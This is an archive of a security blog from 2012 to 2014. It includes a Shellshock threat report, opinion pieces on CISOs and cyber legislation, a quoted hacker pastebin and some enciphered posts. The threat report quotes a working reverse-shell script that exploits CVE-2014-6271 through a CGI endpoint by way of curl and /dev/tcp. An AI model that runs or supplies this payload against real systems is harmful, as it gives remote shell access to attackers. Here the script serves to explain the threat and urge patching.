Krypt3ia

(Greek: κρυπτεία / krupteía, from κρυπτός / kruptós, “hidden, secret things”)

Archive for the ‘Uncategorized’ Category

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

leave a comment »

photo

GLOBAL THREAT INTELLIGENCE REPORT: SEPTEMBER 2014

EXECUTIVE SUMMARY

During the month of September 2014 there were a number of incidents reported as well as stories of malware and crimeware. However, none of them compares in scope and threat to the bash bug that was released for all UNIX and Linux systems on the internet. The “Shellshock” bash vulnerability was released Wednesday 9/24/2014 and within a short time the internet was abuzz with alerts that all *NIX systems were vulnerable to this.

The bash bug is a real and present danger to systems that may misconfigured as well as those with the proper security features enabled. This is due to the fact that once the bug is exploited the attacker may then use other code to exploit the system further and thus compromise that machine. A further discussion of this bug and its import can be found below.

In other areas the global threat level is at a constant but with this new bash vulnerability and the issues surrounding it’s remediation the THREATCON LEVEL for this month post release of the Shellshock bug is at HIGH.

GLOBAL THREATS

SHELLSHOCK:

Shellshock: at its heart is a bug within the parser of the bash shell. The “bash” shell is the most common “command processor” in the UNIX and Linux systems we have today. The bug comes from the parser not stopping its function at the point where the command has been carried out but continues on and allows for arbitrary code to be run.

CVE-2014-6271: This is the original “Shellshock” Bash bug. When most people refer to the Bash bug or “Shellshock”, they are most likely talking about this CVE.

CVE-2014-7169: This is the CVE assigned to the incomplete patch for the original bug.

The original patch was found to be incomplete shortly after the vulnerability was publicly disclosed. A variation on the original malicious syntax may allow an attacker to perform unauthorized actions including writing to arbitrary files.

CVE-2014-7186 & CVE-2014-7187: These two CVEs are for bugs discovered in relation to the original Bash bug. These two bugs are triggered by syntax that is very similar to the original Bash bug, but instead of command injection, they allow for out of bounds memory access. There is currently no proof that these bugs have remote vectors and they have not been seen in the wild.

CVE-2014-6277 & CVE-2014-6278: Security researchers discovered two additional bugs. These two bugs are supposed to have the potential for arbitrary command injection, similar to the original Bash bug. However details have not been made public yet, in order to allow appropriate patches to be created.

ANALYSIS:

The primary issues around this vulnerability is simply this;

The bug could allow for code to be run on systems connected to the internet by anyone who can access them with and simply run code against them. This means all websites that run CGI/HTTP etc that run on UNIX/LINUX as well as any appliance (routers and other types) that have a web based or shell interface that can be accessed to pass the code to.

What this means is that no matter if you have the system locked down it may be possible, if the interface is available, to run 0day code or common commands that may cause the system to respond in ways that it was not meant to. An example of this that may impress the danger upon you is that with the right code, on a vulnerable system, one can create a reverse connection (AKA s shell session) to from your machine to the attacker with some very simple code.

Example Code:

#!/bin/bash

echo little shellshock CVE-2014-6271 cgi-bin reverse shell script by @jroliva

# step 1.- #nc -lp 8080 -vvv

# step 2.-  #./little-shellshock-reverse.sh localhostIP attackhostIP

/usr/bin/curl -A “() { foo;};echo;/bin/bash -i > /dev/tcp/$1/8080 0<&1 2>&1” http ://$2/cgi-bin/test.cgi

Once this code has been run you will have a connection to that machine to further exploit it remotely at your leisure. Additionally due to the nature of the bug and the variability of the code that could be exploited here we are still unsure of just where the boundaries are on attacks using this vulnerability.

Patching the systems with vendor patches is the primary fix to this and to date more patches are being released every day from large and small vendors to fix the parser and to stop the bug. However, you have to be vigilant and seek out all your systems within your environments that may have bash as their shell and insure that they can be patched. In some cases these systems may not have any code to be used to patch because they are out of date and the companies may not even exist any more.

This bug has already been seen used in the wild by APT actors as well as there are now malware versions out there using the bug to seek out and exploit machines automatically. It is recommended that if you have not begun attempts to assess all of your assets both internally and externally that you should do so as soon as possible. This exploit can now be detected by IDS systems signatures but unless they are blocked at the network level by an IPS you may be compromised and not be aware of it already.

Links:

http://www.tchnologyreview.com/view/531286/why-the-shellshock-bug-is-worse-than-heartbleed/

http://www.washingtonpost.com/blogs/the-switch/wp/2014/09/29/the-internet-is-still-shellshocked-by-latest-bug-but-it-wont-be-the-last/

http://www.wired.com/2014/09/shellshocked-bash/

Incidents:

Supervalu Reports Second Hacking Incident:

Supervalu, a grocery chain, has reported a second compromise to it’s payment systems this September. The first was reported on in August and now the second seems to be unrelated to the first incident and group.

These attacks both targeted the POS (Point Of Sale) systems within the stores and the net loss of credit cards according to Supervalu and authorities have yet to be released at this time.

ANALYSIS:

POS systems are notorious for being insecure. The reasons for this stem from not only the fact that the systems often need to be installed on computers with outdated Windows Xp on them but also in that they do not encrypt the data on the fly.

RAM scrapers are simple pieces of malware that sit in the memory of the POS system and just copy the data that is swiped in by the consumer at the terminal. This vulnerability is not new and has been leveraged by the carders who have been carrying out these attacks. These attacks will continue until such time as the POS terminals are secured at the application level and or the more secure “Chip and Pin” systems are implemented in the US as they already have been in the EU.

Links:

http://online.wsj.com/articles/customers-data-may-have-been-hacked-at-albertsons-acme-stores-1412027253

http://www.cbsnews.com/news/new-hack-attack-at-albertsons-supervalu-stores/

http://www.wired.com/2014/09/ram-scrapers-how-they-work/

“The Fappening”: (Celebrity Nudes Hacked from iCloud)

In August the release of nude photographs of famous women caused a sensation on line and in the news media. The photos and videos were all stolen from the Apple iCloud service that all iPhones and iPads use. The FBI has begun an investigation into the hacking incident that caused this and into the attackers who not only hacked into the iCloud but also released the photos online as a breach of privacy.

ANALYSIS:

The “Fappening” as the incident was named on Reddit and other sites within the DarkNet shows just how vulnerable we all are to compromising situations where technology is concerned. It is assumed by us all at some point that the data (i.e. photos and videos) are safe in the cloud storage that we upload to because companies like Apple are doing their due diligence in protecting that content. However, this incident shows that that may not always be the case and that your private and personal intimates may be open to anyone who can brute force a password.

The same analogy can be made for any cloud stored data that a company may be placing for safe keeping. It is important to consider the privacy and security aspects of all data a company or an individual may create and or allow you to hold for them. As such any company doing business holding or letting data be held should take pains to insure the due diligence on privacy and security. The Fappening is a cautionary tale where this all went wrong.

http://www.nytimes.com/2014/09/03/technology/trove-of-nude-photos-sparks-debate-over-online-behavior.html?_r=0

http://www.independent.co.uk/life-style/gadgets-and-tech/news/the-fappening-after-the-third-wave-of-leaked-celebrity-photos-why-cant-we-stop-it-9763528.html

CRIMEWARE AND MALWARE

FBI Opens Malware Investigator Portal to Industry:

The FBI has opened their malware analysis portal online for sharing with private industry. This site will be another in many types of information sharing that the government and private entities will be creating to help in the fight against malware and criminal activities. This portal will have malware samples, data on attacks and signatures to use in determining the attacks and the attacker characteristics.

The portal will also have a feature like malwr.com and cuckoo where you can upload a suspected file to it and allow a session to determine whether or not it is malware and just what it does after it infects a system.

http://www.zdnet.com/fbi-releases-malware-investigator-portal-to-industry-players-7000034186/

ANALYSIS:

The analysis of malware is an important feature in today’s information security program. Reliance only on technologies like AntiVirus is hubris and should be augmented with analysts who can test suspect files and links to insure whether or not they are a threat to the environment.

Often times AV products are on the back end of the curve where malware is concerned today and such tools like Cuckoo and Malwr.com are integral to a functioning IR (Incident Response) program at any company. That the FBI is allowing the use of this also adds value to the FBI in that they are getting live intelligence on potentially unseen malware from their user base.

Home Depot Reportedly Hit by New Malware In Recent Hack:

Home Depot reported in August that they had been hacked and their POS (Point Of Sale) systems were targeted. The hack was ongoing undetected for about 5 months and in that time the carders made away with approximately 56 million credit card numbers and attendant data.

On September 14th though the Unites States Secret Service reported that the malware that was used in this attack was a new variant never seen before. They named the malware “Mozart” However, others are claiming that the malware is in fact the same BlackPOS malware that was used in the Target hack that also stole large amounts of credit cards from their stores last year.

ANALYSIS:

The malware used in the attack on Home Depot is definitely linked to the Lampeduza collective who carried out the attack and sales of the Target data. Within the strings of the code for the mlware there are direct connections to the Lampeduza crew up to and including references to Libya and Ukraine and American meddling in such regions.

This sentiment is echoed in the sites that are affiliated with the Lampeduza group as well as a penchant for Libya and the late Muammar Khaddafi. Another factor here is that the malware fundamentally functioned identically to the BlackPOS malware usedf on Target.

http://online.wsj.com/articles/home-depot-was-hacked-by-previously-unseen-mozart-malware-1411605219

http://krebsonsecurity.com/2014/09/home-depot-hit-by-same-malware-as-target/

APT ACTIVITIES

Chinese Target Hong Kong Protesters iPhones with Malware:

Malware has been discovered affecting the protesters in Hong Kong that began protesting this week. This is a very targeted and rapid attack to attempt to control the protesters and perhaps arrest those who may be sympathetic to their cause.

ANALYSIS:

The malware dubbed “Xsser RAT” was installed by China on the protesters phones and is different than most because it not only affects Android phones but also iOS (Apple) phones as well but at this time no wild version that works has been seen. This cross platform malware has the ability, once installed on the phone, to see and capture everything that the user does on the phone.

Code within the malware has shown that it contains Chinese characters and reports back to a command and control that is under Chinese control. This is just another escalation in an ongoing battle over protests concerning a more free Hong Kong, something China does not necessarily want.

This incident serves as a parable on how advanced persistent threats can use weaponized code that they have already in their control to rapidly deploy and use against those they would wish to attack.

http://www.nbcnews.com/storyline/hong-kong-protests/hong-kong-protesters-phones-targeted-chinese-malware-experts-say-n215396

Putting TRANSCOM in Perspective

Today, the Senate Armed Services Committee released information indicating that China-based threat actors were heavily targeting TRANSCOM, the U.S. military’s logistics arm. In terms of the private sector contractors impacted, the intrusions detailed in the Levin report mirror activity FireEye has observed: we frequently see nation state threat actors target not only government, but also private sector organizations in order to obtain military intelligence.

ANALYSIS:

Fireeye put out a blog post after the US DOD put out a report on attacks that were carried out by APT actors against defense base companies. This is not necessarily news but the fact remains that not only the defense base has been a target of late of nation state actors.

While APT (Advanced Persistent Threats) are prevalent it is important to know that they are targeting anything and everything that may be of interest to them. This means now that public systems as well as corporations are now potential targets. As such, it is important that all companies take the time to understand what all of this means, how these actors carry out their attacks, and how one can protect against these attacks.

http://www.fireeye.com/blog/technical/2014/09/putting-transcom-in-perspective.html

I have also created a word format of this document with a section where you can put in your own metrics. Use this document to give your executives a threat intelligence report and hopefully enlighten them on what is going on out there.

LINK TO WORD FORMAT OF THIS DOCUMENT: HERE

Written by Krypt3ia

2014/10/01 at 20:28

Posted in Uncategorized

CISO’s CSO’s and Target Debacles

with 3 comments

giphy

 

The Target Debacle & CIO/CEO Separations

Yesterday I had a short conversation with Brian Krebs post the news that the Target CEO was being fired and that his severance was a fat 65 million dollars for the effort. He mentioned that he was asked to do an Oped for the Guardian on this and I vented on the subject of CISO’s and CSO’s not being worth their salt on average as well as that if they do have a clue they are hamstrung by upper management. Brian’s post this morning made some salient points about not only Target but many companies in general that may not even have a CSO or CISO title in their food chain. What does this mean for the “security” of those organizations he mused. Well, in my opinion those companies that don’t have a CSO/CISO are only more nakedly clear about their lack of care on the subject of security than those others who have the titles but hamstring them or have useless individuals in the roles.

That the Target CEO leaves with a large sack of money and there is still no CISO/CSO position filled at Target should be a clue for all of you out there that they really don’t get security nor do they really care. Sure they will dump a lot of money at the problem like Brian says in the Oped but that will not change the culture that caused alerts to be ignored will it? Perhaps they will be more sensitive for a while but I am sure they will go back to their somnambulism on security soon enough once the press has died down on this. Of note in the news concerning the CEO’s departure from Target is that he was not only axed because of the hack. In fact the CEO was sent packing because he bungled their strategy of opening stores in Canada. This is the reason he was ousted in my opinion more than the hack. You see, a CEO is at the will of the board and the board was not telling him he needed better security or a CISO were they? Net/net nothing has changed at Target but spend on security to look like their is some magic happening but that’s about it I fear.

CISO’s and CSO’s

Now, about those CSO’s and CISO’s out there. As I have mentioned before I am the Methuselah of INFOSEC (TM) so I have been around a while and seen a lot of things that made me go “hmmmmm” One of the more common issues other than not having any kind of C level security exec in a corporation is the CISO/CSO dunsel. Now these people I have generally found doing my own recollection statistics from assessments over the years have been on average figureheads only. This is a sad and rage inducing fact for me and has been throughout my INFOSEC career. What has come to pass is the recognition that if the CISO/CSO has any credentials it is usually a CISSP and that’s about all the experience they have had. I have not run into too many CISO/CSO’s in general corporate ‘Murica who have actually done the work that would make them a good CSO/CISO and rightfully claim the word “security” as a field of expertise.

I was Tweeting earlier these sentiments so I will just kinda put them into a bullet list here…

  • CSO/CISO’s should have been Network Admins/Security/Auditing people who actually did the job. Anyone who is only a theoretician should not be doing this job unless they listen to their security staff and follow their lead. However, if you haven’t done the job how the fuck are you going to understand what your tech tells you?
  • If your CSO/CISO does not have a good rapport with the security team that actually does the work what good are they? If you have a CISO/CSO that is very “executive” then it’s game over.
  • If your CSO/CISO is too politic and boot licking to his peers within the org or bows to pressure too easily without a fight.. Well what’s the point?

I guess the summary here is that if you have a CSO/CISO that isn’t passionate about the job, understands the technologies and the issues, and generally will listen to the staff under him advising them about the issues of the day then you should get out of that org and find a place where they do. You will not get anywhere and you will be frustrated… unless you let apathy win and just go through your day not caring. Alternatively you will get all that burnout we all have been yapping about lately and that is no way to go through life either is it?

Report To Chains

Another big issue here is the placement of the CSO/CISO in the food chain. I have seen many orgs who actually have a CSO/CISO in the food chain but they are hamstrung because they report to the wrong person. The fact of the matter is no CISO/CSO should report to the CIO alone. Nope, a CSO/CISO should report directly to the CEO and be available to give them the straight dope on what the problems are within the org. I have seen places where the CSO/CISO is just cock blocked by the CIO who takes his reports and files them away for no one to see. Why? Because it may rock the boat or make them look bad in the eyes of his peers that’s why.

The CEO and the board should get an unfiltered channel on the inner workings of security within the company so that they are informed. Unfortunately this is not the case in most places and in fact security as we all well know is the cost center redhead stepchild no one wants to deal with most of the time. If the report to chain is fubar then the poor CSO/CISO’s job is basically to be the fall guy/woman when the shit hits the fan.. sorta like the Target CIO, who coincidentally had no IT experience to start with so there you go. It’s just an illusion of propriety for the shareholders and the media folks and nothing more when this happens.

It is my firm opinion that every org should really take a look at their report to chains and see just how well or not that’s working for them. If they have a CSO/CISO that reports just to the CIO let’s say and is filtered what good is that? There has to be efficacy here but then again the orgs have to care about security in the first place and not just give lip service to it for the media and the audit teams right? Too many orgs are just broken and just don’t really care to change that. I would hazard that Target is even one of those companies post the POS hack and loss of millions of credit cards and personal data.

Speculation On Changes Post Target

While on the subject of Target I would like to say that they will care about security until such time as they are no longer in the news. Sure they have lost money but they will bounce back and the shoppers will return soon enough. You see we all have short attention spans out there and we will soon forget all about this debacle. Our fears will dissipate and we will go on with our lives because we have not really felt the sting here from this hack. What do I mean? Well, who pays for the credit monitoring? Well that would be Target. Who lost their money altogether and wasn’t reimbursed for their credit cards being stolen? Well that would be maybe the banks right?

What I am saying here is that overall the banks should be the ones forcing the companies to tighten their security because they are the ones paying for this in the end. Well, actually, I suspect we all will pay in larger fee’s in the future right? I mean the banks have to re-coup their losses too and who better to fund them than all of their customers right? Hey it’s a win win win here financially in the long run so without an epic flame out no one will really care at the end of the day right? The Targets of the world will live on and go back to what they were doing before because vigilance and doing things right is hard and costs too much in their books. They will just buy the next blinky light appliance that some FUD vendor hawks to them as the new panacea to all hacking and they’ll be good!

K.

 

Written by Krypt3ia

2014/05/06 at 15:04

Posted in Uncategorized

The 2012 INFOSEC NAUGHTY LIST NOMINATIONS

with one comment

That’s right kids! It’s that time of year again when ol’ Krypt3iaclaus comes out and opens his sack of CYBERCOAL for those of you who have been especially BAD in INFOSEC this year and BOY has there been a lot of “BAD”  I am taking nominations! So please surf on down to THIS HERE LINK and put in your ATTRIBUTION FREE nomination for the INFOSEC NAUGHTY LIST 2012!

Yours,

Krypt3ia.

PS: If they’ve uttered CYBER seriously they are likely to not be eligible for the list.

Written by Krypt3ia

2012/11/01 at 18:18

Posted in Uncategorized

The Threat Is Real and Must Be Stopped: Clarifications And Rebuttal by an INFOSEC Professional FINAL DRAFT

with one comment

All,

As the New York Times deigned not to respond to my opinion piece I am posting the final draft here and linking to it from the NYT comment section of the opinion piece by Sen Lieberman.

Cheers,

K.

On October 17th, the New York Times “Room for Debate” section ran a piece by Senator Joe Lieberman with the title “The Threat Is Real and Must Be Stopped” in which Lieberman argued the dire need for passage of his cyber security legislation . In this commentary, Sen. Lieberman makes assertions about the national security issues surrounding the existential threats to the nation stemming from computer hacking and how “easy” it is. While I can agree with some of his commentary – such as the need to ensure the security of the nation’s critical infrastructure – I disagree greatly on his assessment of the gravity of the situation. Why? Because I have actually been working in the computer and information security industries since the late 90s and have firsthand experience with the systems and networks that he’s going on about. There are far too many unknowns at this time to be making such prognostications as “there will be a cyber 9/11” unless we pass his bill.

Even within the information security community, there is disagreement on the issue of just how hard or easy it would be to pull off a credible, existential threat type of attack on our critical infrastructure. The complexities of the systems involved, as well as their connectivity, have never really been fully investigated. They should be thoroughly assessed before we start to worry about legislation to mandate “check box security” to protect it. To Senator Lieberman: the problems, sir, are far too complex for any bill such as Sarbanes-Oxley or yours to tackle. In fact, past experience has shown that regulations such as SOX and HIPAA are by themselves essentially useless in actually protecting networks, systems, and data. The best of intentions often still yield poor results when one fails to understand the problems and threats at hand. I would suggest that the Senate undertake an investigation of every critical infrastructure network before they begin to mandate how they should be secured as due diligence. Without really understanding the problems, you will be just adding useless oversight to private corporations to whom security spending is already anathema.

But so far, Senator Lieberman, I have only seen gross generalities out of you and your peers in government about how dire things are and how scared we all should be. Especially to those of us in the security community, your hue and cry ultimately lacks any hard evidence that the issue is so real and your warning so prescient that action must be taken post haste. Nor do you seem to understand the technical, legal and political issues at hand well enough to draft legislation that would be helpful to those of us who secure the nation’s infrastructure. As best I can tell, you want to have blanket rules mandating that companies protect their assets – but at what cost? Under whose control and oversight? Would you suggest  that the federal government take charge of penetration testing and auditing of those companies with critical infrastructure assets? If so, let me direct you to an aphorism you may have heard: “Physician, heal thyself.” My peers and I would love to see government entities take their own networks to task before regulating private companies’ security standards and oversight. Currently many government networks in the U.S. and abroad are a security shambles and can be attacked very easily, while private companies are often much more difficult to attack. This is businesses tend to take information security much more seriously than the .gov space does. So sir, please clean your own house before you demand the right to send officials to check on mine

Senator, in the end I frankly believe your heart is in the right place. Others may see your machinations as more of an attempt to keep yourself relevant in the Senate and the news cycles. Either way, your actions such as the opinion piece in the N.Y. Times only serves to whip up FUD (Fear, Uncertainty, and Doubt) within the general populace by using scary language and innuendo about how the scary hackers out there are going to turn off their lights and water. An example of this is the following quote from your piece:

National security experts from Republican and Democratic administrations — privy to our best intelligence and analysis  all agree this threat is real. So, I am mystified by claims that it is not. Free, downloadable hacking tools, like the nefariously named Metasploit and Shodan, are becoming more powerful and easier to use every year. A researcher who used one of those tools found over 10,000 industrial control systems connected directly to the internet. Many of the systems, which run critical networks like hospitals and power plants, had little to no security.

The language here is disingenuous, simplistic, and grossly melodramatic. While you claim that there is credible intelligence to support these threats, you cite none. (The over-classification issue today is in fact quite out of hand, but that is for another article.) The second issue you fail to address is the likelihood of an attack actually happening and being successful. It’s another case of “Trust us, we’re the government,” and for myself and my peers in the security industry, it smacks of knee-jerk reactions at best and power-grabbing at worst. Do you begin to understand the intricacies of the issue here, or are you working with received ideas from government security “experts” who have failed to secure their own assets? Are you now yourself a security expert? If so, then I understand your confusion as to some of us call your comments into question. But until you demonstrate any insight whatsoever into this problem, I will continue to call you on your credibility on this matter.

I would also like to take you to task over the comments above about the “nefarious” software you lament,  and share some facts about Internet addressable ICS/SCADA systems. While the names of the software may be foreign and scary to you, their “scariness” has nothing to do with their branding. Perhaps it’s their function that should scare you, and that is what you need to impart instead of taking artistic license with your diatribe. Both software packages are freely available on the Internet and have been for years now. To date, there has been no massive attack on our infrastructure because of them or any other software, nor have you cited so much as an attempt to do so. So again, your hyperbole is wonderfully scary, but the facts continue to escape you. While you mention that there are 10,000 Internet addressable ICS/SCADA systems online, you fail to mention any information as to how many are in fact vulnerable to attack. Do you even know? This is an important statistic you fail to give the reader, and it seems perhaps you have no clue as to its significance. As an old co-worker at IBM used to say to me, “A fool with a tool is still a fool” and it’s quite true. Sir, you are a fool with a tool and you lack the understanding to even use the tool.

In closing, Senator, let me give you some constructive criticism. If you want to help us all and protect our infrastructure, stop being Chicken Little and start being an advocate for the truth of the matters concerning computer security. Stop the jingoism and begin drafting plans to have studies performed on the whole of the infrastructure to understand just how vulnerable it is and what can be done to protect it. As far as I’m aware, there has never been a proper threat assessment carried out on the entirety of the systems you are worried about. As Marcus Aurelius said, “Of each particular thing, ask what is it in itself? What is its nature?”  Let’s first define the problem and then seek to fix it. By imposing laws such as SOX willy-nilly, you may intend to protect the systems; instead, you may be placing undue burdens on corporations, as well as ineffectively attempting to secure the nation’s infrastructure.

Until such time as you and your ilk really understand the problems and allow for further study, none of us will be any more secure than we are today – even with your new and wonderful legislation in place, in the unlikely event it ever makes it through a vote.

Regards,

Scot A. Terban CISSP

OSINT/Security Analyst

Written by Krypt3ia

2012/10/29 at 16:49

Posted in Uncategorized

ISC(2) Board Petition UPDATE 2

leave a comment »

Dgvm Vt Sjaxl3ki!!

Ok, so in a twist of ISC(2) fate, it seems that when one “petitions” for the ability to run for the board, one must have the signatories send an “email” instead of just fill out their information on some excel sheet or online petition. So, with that said, if you are wanting to sign the petition for my being able to run for the BoD at ISC(2) then please email me at drkrypt3ia@gmail.com with your name, CISSP number, and attestation that you want to nominate me.

To all those who have already nominated me and responded to the broadcast email I sent out earlier..

THANK YOU!

To all those yet to vote, please do consider me as a possible board member and send that email!

Dr.Krypt3ia

TEXT

Written by Krypt3ia

2012/08/31 at 00:35

Posted in Uncategorized

liggyliggyliggy

leave a comment »

Epk yrzze ym qix… Zspajgw WQMGRE kgrjd uk gr xg ksnwwekp lvj zfcmgzcya sk utbn zfp ngir sm qtmha cnccm O rggm. O nyyo av my pos. Rfmyjyj mbkltvm nc nirrq puvrmjmxy jpogr rpis glo jugpcl ul btzkirzzy. Ngd krggx qy zflb O glo i igzlt ul flkqkpd pgiipl nok faote epkop cmyusckky yyl ygwd pk nyd xxumq. Pk yyja nk uttr vpzdojc epk vpzwl tcib jgw. Zv znc ymdz blg (Znsca) nk qpvjy dttky rsiz olntajc lv otrpzxuelbuxw qzus rsm rgqe kuape kgyc. Epoy dttk oq epk yrlbkscyb ut kj wctccanon zn znc wqmgretkgid lusytv gtb epk vpzkkyq zn sk rfztolr qz utpz zu jtqmmw ew mkr ncz use wl zfp tgyr dcoz. Fta irytu oy rsiz O flkqkb sqs lpzu se cxxruwpz hkalcyk G lkikqdmj zfp lusytv (zu rfzt or zdkx rz pos) dcws sw puvrmjmxy bzugol la vkp cmwacdb ul kj tgcwpz (tkcomj or ywc tmh vuc)

Rscxyblg gz 2:55nx bnk GOA gz cxxruwpz jkrpkzy yxqngavmxvpzwl.imx aiglyqtm rsm ksnwwekp owsggy itj gd azunamj. Kkatuecc qy gjpzzkb mg sk yyl ck ywt ngtp i yor owct yd irr mq bnk ywtkmyequtq lvj yfpvgtgrity fldk iyfakj rsms zm nwtygomx rcebote xm mu. Fzekbcc, wtic epke rltq glo kgrj epk LZT (toyrpl ot jtome’q qqrkq la vxmzn O jgo bnoq epote) wmgxl epgz rsm LHG diey G sibk lzbnolr bu jm hqzn fta ngav itj rsme qlze nk gd rayr l kxgxj luusnpk.

Gdemx smcm zgjva cors Tomej, pk hynsvkbotky my “Q gs ezqtm rz aak wzc grj” ew “O gk rwote ew cxgem gt cixuyc ljuar jwa gjw” itj cxxruwpz jkatlky rz rayr wmz ngx. Ilzcc irr, usw’y mmtvm zm nixk? Lz wtk ppijy fta hrmr itj gq itemym gyid bnkw hqrr rptr zfp bxars bngr sm oy hfaz g jjqtm qlkq ud dpoz (kj euxbd) Au, or’d jkkl bcozc l ekki. Epoy plblaav wtic logol ezokb lvj lyttkj rz izzyns sk jpogrjj itj gwtkmywte glo uoyqpl znc xixq. Rsqy zgxm oz ncqsgptte cyd qrrcrirrw epgz fp izzynskj yyl lup epgz rsm mrmgmy gpp wll.

Kpitcfttk, zfp kgaqp wl gjw wl zfta zngd bosc lzualo egy Jtome’q luonynskxncwul.azu cngnp O cpzbk gzzcz rydb ckcvmtj. Qtvik G hzuzc ljuar tb, oz fla hkcy jayw dkgtltvm gjw sotbd wl ygemy or dmksq qzus rsm zcgebkx dpmj. Or pdkt qeixzco pozrtvm .sgw itj .ezd yorpa. Gy mq bnoq xwxtgyo znmfon, or ta tuu znlrgym, gy ycm grj zn roerg’y ygemy.

Nmh kgt mym vxgyb gt cixuyc hpkt rsmxk gd vu ygem zu ncqtz ge wt ulp eutbpzy….G azvtalozas ffp?

Yu, rsiz’y ge, bngr’d bnk qewxe. Rlsk lpzu oz usiz emf eorj. Wmzy qpm cnye bnk jtosgl ezokq ymdz.

I

Written by Krypt3ia

2012/03/31 at 11:32

Posted in Uncategorized

Revelation

leave a comment »

EhwvvBzSxjmla

Written by Krypt3ia

2012/03/31 at 11:07

Posted in Uncategorized

Tagged with

Tit for Tat: Israeli Hackers and Muslim Hackers Bring Knives to Gun Fights

with 2 comments

Malone: You wanna know how to get Capone? They pull a knife, you pull a gun. He sends one of yours to the hospital, you send one of his to the morgue. *That’s* the *Chicago* way! And that’s how you get Capone. Now do you want to do that? Are you ready to do that? I’m offering you a deal. Do you want this deal?

The Untouchables (Sean Connery)

Neener, Neener, Neener, I Have Your Credit Cards!

 JAN 18TH, 2012

Important message from 0xOmar from group-xp

BY: 0XOMAR | JAN 18TH, 2012 | SYNTAX: NONE | SIZE: 1.75 KB | HITS: 196 | EXPIRES: NEVER

  1. Important message from 0xOmar from group-xp the largest Wahhabi hacker commando of Iran.
  2. Things do not go as well as they should:
  3. * First came the Russians (must be KGB agents) and hacked my 0xOmar@mail.ru email account and changed password.
  4. ** Then someone (American FBI feds most likely) hacked my pastebin/0xOmar
  5. *** If this was not enough… some mysterious hand (Allah himself/herself?) keep deleting our group-xp information of none existing cc numbers!
  6. **** Anyway, since I am the greatest 0xOmar with direct power from the President in Iran – I knew what to do. To start my own website at: http://204.188.197.33 But guess what?????    Now this has also got hacked and turned into an Apache server start page!  This time I have no doubt who is behind this brutal and illegal actions of vandalism! It must be the Apache Indians themselves.
  7. ***** Updated: now I am using torrents – just in case, if you discover that you are infected with one of my Trojans while downloading my torrent, the Trojan will only pick your credit card number and any password if possible and be sent further to all your contacts!
  8. Please do not worry about this small technicalities its for the sake of helping the poor Palestinian children in Jerusalem who stand in the middle of the road while throwing stones on Israeli drivers, we will attempt to use your credit card for teaching them where to stand next time they try killing Israeli drivers.
  9. http://www.youtube.com/watch?v=XlXRAJ7SuVI
  10. http://www.youtube.com/watch?v=At9b3YQSQ_E
  11. And if its OK with you, I will use the rest of the credit on your card for learning what hacking is, because I am complete clueless lamer when it comes to hacking!
  12. Thank you!
  13. 0xOmar from group-xp the largest Wahhabi hacker commando of Iran

Pastebin Timeline courtesy of the CTRL+C –> CTRL-V skills of GatoMalo http://pastebin.com/QD1R7ivZ

If the pastebin above is to be believed as legitimate, then we see 0xomar, the alleged hacker putting out some reasons (albeit addled ones) as to why he is hacking credit card accounts of Israeli’s. Seems that Omar is a fan of Palestine and thinks that by “doxing” like Anonymous (and there may in fact be a connection between the two) will make a change in the greater geopolitical scheme of things in the Middle East. I think it’s a misguided effort myself, if at all true… No, it seems more to be just about some lulz than anything else really.

Some of what is said here does not jive either with this guy being a Saudi.. The whole Iran thing at the end pretty much says it all to me.
Meh.

Anyway, it seems that a new war of annoyance has begun between the self proclaimed hackers from Saudi “Group-xp” (named for the Windows operating system they like to use? heh) have delcared a jihad on Israel and their credit rating…

Person by person that they can hack and expose…. *shudder*

Meanwhile, Israel threatened physical/legal action against the hacker(s) if they catch them (him) and tried to say that he was in fact a hacker in Mexico. Of course Omar said that it wasn’t him then taunted them with two weeks to locate him or he’d drop more documents online for everyone to be titillated by.

Ugh…

Oh Yeah? Well I have DoS’d El Al and Your Stock Exchange! (Well, their websites.. doing no real harm)

Then Omar and his “crew” went on a raging DDoS of El Al’s website and the Israeli Stock Exchange!! Which knocked the sites offline but not the businesses.

TAKE THAT ISRAEL! WE HAZ YOU NOWZ!

Really…

Soon more dox will be dumped, more credit cards I assume.. But really, is this doing anything for the fight over the Middle East? 0xOmar does not seem to be winning the war against Israel here and I have to wonder just what the end goals are here. Just as well, I also wonder if this is just a hanger on who wants to play Anonymous’ game and attempt to make a splash in the digital as well as the analog communities he is talking about.

Or is he just in it for the lulz?

Of course there was the dropping of the SCADA passwords recently, and this.. Well this is more along the lines of doing something isn’t it? As I wrote recently about “cyberwar” the real aegis is to damage infrastructure, cause supply chains to fail, and in the end invade or conduct military operations against someone else. So, would not the use of these SCADA passwords by the likes of 0xOmar to down important systems and cause greater damage as a whole be more advantageous here?

Or is it that this is a one trick pony we are all seeing in the news?

Like the quote from “The Untouchables” says pretty clearly, you wanna do damage you don’t bring a knife to a gunfight kid.

The Geopolitics of DDoS and DOX-ing

Meanwhile, this all has me thinking about the DoX-ing going on with the Anonymous model of geopolitical force. So, could posting documents like Wikileaks have a longer lasting and more prolific change on a country/government than just dropping credit cards? Of course! I mean, who gets hurt really in the dump of credit cards? The banks just pass that along to the customers eventually so really… No one gets hurt but the end users.

..and those end users are not going to beg the government to make the bad man stop?…

Nope, the real deal would be to attack infrastructure and cause havoc.. Not this skiddie crap. This is the problem with Anonymous too. So far they have been a wind storm in a china cup really. They think that they are doing massive things, but the reality is that change happens slowly and raising awareness is great, but, it may not have the outcome you want.. Nor will it happen right away.

So, 0xOmar, I think that there are too many holes in your story, too little effect from your dumps, and just enough media hype to keep you happy.

Enjoy it will you can.

K.

Written by Krypt3ia

2012/01/19 at 19:54

Posted in Uncategorized

Emergent Warfighting in the Physical and Digital Realms: “Swarming”

with 3 comments

I recently mused on the preponderance of articles on the Ansar boards concerning insects. The postings all centred on Bee’s Ants, and other insects that, as it was pointed out to me later, “swarm” It was after this epiphany, that the person who reminded me of this fact, sent me a link to a pdf file written by the military back in 2000 and updated in 2005. This document produced by the RAND Corporation has hit the mark today especially for me post the Wikileaks DDoS and I should think that others have picked up on this, namely, the Jihadists.

Al Qaeda,” or “the Base,” as Osama bin Laden’s terror network is known, may be trying
to engage in “strategic swarming”—an effort to strike simultaneously, or with close
sequencing, at widely separated targets (e.g., the embassy bombings in Kenya and
Tanzania). But, so far, his ability to mount operations of strategic significance seems lim-
ited. Also, to the extent to which the Base’s operations depend upon bin Laden’s direct
leadership, this is a case that differs from the “leaderless” quality of classic swarm theory.

